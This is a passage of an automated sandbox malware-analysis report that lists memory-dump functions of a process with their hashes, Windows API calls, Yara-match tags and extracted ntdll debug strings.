                                                                • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                • Instruction Fuzzy Hash: 7FD0A76770010C39AA1145D46CC1DFFB71CDB846A6F004063FB08E1040D5218D0206B0
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00C61990,00C77ADF,00C7519E,00C61956), ref: 00C67DB0
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: e4bdde0dbc89c6e6e1787f0884092666664ef0c758f7199df5ec285d151b862f
                                                                • Instruction ID: 202b33b35cbd148a4e26183712041256e9f6878fca05e365a511bbedf8621d43
                                                                • Opcode Fuzzy Hash: e4bdde0dbc89c6e6e1787f0884092666664ef0c758f7199df5ec285d151b862f
                                                                • Instruction Fuzzy Hash: 2AD05E727943053BF714E6E4DC03F26328C9B00B55F088464BD18D72C2DDA5F5405679
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 96ca0a715875c983adf7b3b7ba83d4614da6bb79349dbfa050ecb5fc2cd0414a
                                                                • Instruction ID: 2a677419ddc8b52210f05f62f785dcee1e4ccfc2f2ce27213d7538903df515f8
                                                                • Opcode Fuzzy Hash: 96ca0a715875c983adf7b3b7ba83d4614da6bb79349dbfa050ecb5fc2cd0414a
                                                                • Instruction Fuzzy Hash: 3FB09B729019C5C5FB15F76046087177900EBD0705F19C0E1D2030742E473CD5D1F275
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133348638.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4a60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ca1e84ee6b4f8d87c725cf019f5e0126c6176da06ee532a7d8ae67e39261f36f
                                                                • Instruction ID: 74ff4d38074860619b7db5fa6782a4362855bb7de3f849639729097769176138
                                                                • Opcode Fuzzy Hash: ca1e84ee6b4f8d87c725cf019f5e0126c6176da06ee532a7d8ae67e39261f36f
                                                                • Instruction Fuzzy Hash: BB41A37561CB4D4FD368EF699081676B3E2FB89304F50492DD98BC3252EA70F8468785
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f52d45f995faf152995063f51a20150de1689d5a4e8f24d476871b50d9bf54da
                                                                • Instruction ID: a375f9cc16bc18eaebdf34dc186560b78abf4cdfc70e4396f0c1021e3aedd81d
                                                                • Opcode Fuzzy Hash: f52d45f995faf152995063f51a20150de1689d5a4e8f24d476871b50d9bf54da
                                                                • Instruction Fuzzy Hash: 35C01232AA011406D2344D6DBC015F6F3B4D347135F01136BEC59E72C09246C82141C8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133348638.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4a60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                • Opcode ID: 22a7c8b0da55f4a65a7585aac32c6abdeec44cec52396e664b905a40dc1b52cf
                                                                • Instruction ID: 31b90e99c17590f32659fc3b00e06994c30997b39c7db69f3cdfbc405f9744db
                                                                • Opcode Fuzzy Hash: 22a7c8b0da55f4a65a7585aac32c6abdeec44cec52396e664b905a40dc1b52cf
                                                                • Instruction Fuzzy Hash: 4E914EF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058F85
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
                                                                • Instruction ID: 636d964d1d49422f2b745b17b102a95622faf81f9a19f53d5bbffc03fca3a9af
                                                                • Opcode Fuzzy Hash: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
                                                                • Instruction Fuzzy Hash: F451F4B6A04256BFDB24DFA8C88097EF7B8FF5820471081F9E455D3645E275FE508BA0
                                                                Strings
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C04742
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C04725
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C04787
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C04655
                                                                • ExecuteOptions, xrefs: 04C046A0
                                                                • Execute=1, xrefs: 04C04713
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C046FC
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
                                                                • Instruction ID: a00962b534e47bf14bdf1a2f9337bc7ec2f7b58ef91a66ce4d47c0963416acd6
                                                                • Opcode Fuzzy Hash: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
                                                                • Instruction Fuzzy Hash: 3E51D63164021A6BEB14ABA8DC89BAA77A9EB05304F1400EDE505A7290EB70BE459F64
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                • Instruction ID: 8ea8b20c90f8ad04a871fb56670030744011d0849de77c8b79dc5c6628c62395
                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                • Instruction Fuzzy Hash: 2B819070E092499FDF288E68C8917FEBBA1EF45350F1A45E9D861A7290F735B840CB54
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133348638.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4a60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $29j$42:>$54?%$5>&"$==0~$q#'k$xq=8
                                                                • API String ID: 0-2804897488
                                                                • Opcode ID: ae24b7c912e6ff6871b7b6a8e4f2d56c647b38885a4ed322085bd82e7a71b637
                                                                • Instruction ID: 8c4b93ae8750f320f62641545189e0213bc46aa97121275cdac1cc460be187b4
                                                                • Opcode Fuzzy Hash: ae24b7c912e6ff6871b7b6a8e4f2d56c647b38885a4ed322085bd82e7a71b637
                                                                • Instruction Fuzzy Hash: A81125B081468D8ACF14CFC9D9856EEFFB1FB00700FA04288E415AE354DB795A468F99
                                                                Strings
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C002E7
                                                                • RTL: Re-Waiting, xrefs: 04C0031E
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C002BD
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
                                                                • Instruction ID: d8d39e8031efdd2bb1c00b88a28773095198f527b495c84abafe1dac27357efb
                                                                • Opcode Fuzzy Hash: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
                                                                • Instruction Fuzzy Hash: 05E1AE306047419FD725CF29C884B7AB7E1FB49314F144AADE8A5CB2E1E7B4E945CB82
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 04C07B8E
                                                                • RTL: Re-Waiting, xrefs: 04C07BAC
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C07B7F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
                                                                • Instruction ID: 5d2287009b334b80f932f74c77fdb8f21e102a7f4a530278e0342ebf5bbe88da
                                                                • Opcode Fuzzy Hash: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
                                                                • Instruction Fuzzy Hash: 294126317057029FDB24DE25D881B6AB7E6EF88714F000A5DF95ADB780DB30F5059B91
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C0728C
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 04C072A3
                                                                • RTL: Re-Waiting, xrefs: 04C072C1
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C07294
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
                                                                • Instruction ID: 11c88b374c05c67a5079e53d5518056ed340b5bb87273e4fd187ea586cf269c0
                                                                • Opcode Fuzzy Hash: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
                                                                • Instruction Fuzzy Hash: DB410F31709216ABDB24DE25CC82B6AB7A6FB84714F10465CF955EB280EB30F9529BD0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                • Instruction ID: 73c811ced668665b9063b238c16017b956f6b88c948527438643f63d9cef9580
                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                • Instruction Fuzzy Hash: 59919270E002569BDF38DE69C881AFEB7A5EF44720F5449DAE865E72C0FF30A9418760
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
                                                                • Instruction ID: b50b94d581e636404f4a98d3b0e3de3166a23488acedf31cc35f2237ee902338
                                                                • Opcode Fuzzy Hash: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
                                                                • Instruction Fuzzy Hash: 17810DB5D00269ABDB35DF54CC44BEEB7B4AB48714F0041EAAA1DB7240E7716E94CFA0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133348638.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4a60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 48|}$j$}48z$~tyl
                                                                • API String ID: 0-2147111384
                                                                • Opcode ID: 750b35d6c06beb54168629759277d39f7315a8d4601974e0bfe16de925bfac15
                                                                • Instruction ID: 8c582f9e2ce96446f160f81c942e0ace061b46891e690b421164026a8585d500
                                                                • Opcode Fuzzy Hash: 750b35d6c06beb54168629759277d39f7315a8d4601974e0bfe16de925bfac15
                                                                • Instruction Fuzzy Hash: FFF024704187488FCB08AF08C405669BBE1FB99309F80072DE8C9CB321CF39D6018B46